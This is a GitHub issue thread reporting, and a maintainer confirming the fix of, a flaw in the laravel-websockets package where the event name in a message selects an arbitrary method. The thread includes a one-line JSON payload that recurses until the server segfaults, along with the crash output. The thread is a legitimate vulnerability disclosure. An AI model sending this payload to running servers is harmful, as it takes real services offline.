### ISSUE TITLE
[Сritical] The server can be crashed by sending a malicious request

### ISSUE THREAD

**Issue by Catzilla** [beyondcode/laravel-websockets#173]
Found a vulnerability here:
https://github.com/beyondcode/laravel-websockets/blob/1c2b89b54d8d9d1c796b8391e41207da2a2f2423/src/WebSockets/Messages/PusherChannelProtocolMessage.php#L35
We can call any class method by specify its name in the message.

For example, we can easily provoke recursion and destroy the server, simply by sending:
```json
{"event":"pusher:respond"}
```
Result (server stdout):
```
appname: connection id 362698897.592504843 received message: {"event":"pusher:respond"}.
Segmentation fault (core dumped)
```

**Comment by mpociot** [comment]
Thanks. Fixed it
